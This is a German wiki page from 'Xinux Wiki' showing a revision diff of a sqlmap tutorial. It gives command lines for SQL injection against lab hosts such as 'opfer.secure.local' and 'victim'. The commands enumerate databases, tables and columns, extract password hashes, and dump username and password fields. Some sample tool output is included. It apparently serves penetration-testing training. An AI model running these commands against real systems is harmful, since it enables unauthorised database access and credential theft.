Sqlmap Anwenden: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(25 dazwischenliegende Versionen von 2 Benutzern werden nicht angezeigt)
Zeile 1: Zeile 1:
=Augabe aller Parameter und Optionen=
+
=Ausgabe aller Parameter und Optionen=
 
*sqlmap -hh
 
*sqlmap -hh
=Angriff und Auflisten der Datenbanken=
 
*sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -dbs
 
;Infos
 
<pre>
 
[16:48:08] [INFO] the back-end DBMS is MySQL
 
web server operating system: Linux Ubuntu
 
web application technology: PHP 5.5.9, Apache 2.4.7
 
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
 
[16:48:08] [INFO] fetching database names
 
available databases [4]:
 
[*] information_schema
 
[*] mysql
 
[*] performance_schema
 
[*] sql_injections
 
</pre>
 
  
=Auslesen der Tabellen der Datenbank=
+
=Datenbanken anzeigen (optional)=
*sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -D sql_injections --tables
+
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" --dbs --batch --string=VALID
=Auslesen der Passwort-Hashes aus der Datenbank=
 
*sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --passwords
 
*Interaktiv kann man hier einen Dictionary-based Angriff starten
 
=Dump der Datenbanktabellen=
 
*sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -D sql_injections --dump
 
=Struktur einer einzelnen Tabelle auslesen=
 
*sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --columns -D sql_injections -T my_auth
 
=Daten aus einer Tabelle auslesen=
 
*sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --dump -D sql_injections -T my_auth
 
  
=Aufruf des Wizards=
+
=Verwundbarkeit bestätigen=
*geführt und interaktiv
+
 
*sqlmap --wizard
+
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" --batch --string=VALID --flush-session
 +
 
 +
=Tabellen der Datenbank tuxmen=
 +
 
 +
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" -D tuxmen --tables --batch --string=VALID
 +
 
 +
=Spalten der Tabelle mitarbeiter=
 +
 
 +
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" -D tuxmen -T mitarbeiter --columns --batch --string=VALID
 +
 
 +
=Daten dumpen=
 +
 
 +
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" -D tuxmen -T mitarbeiter -C username,password --dump --batch --string=VALID

Aktuelle Version vom 25. Juni 2026, 05:42 Uhr

Ausgabe aller Parameter und Optionen

  • sqlmap -hh

Datenbanken anzeigen (optional)

Verwundbarkeit bestätigen

Tabellen der Datenbank tuxmen

Spalten der Tabelle mitarbeiter

Daten dumpen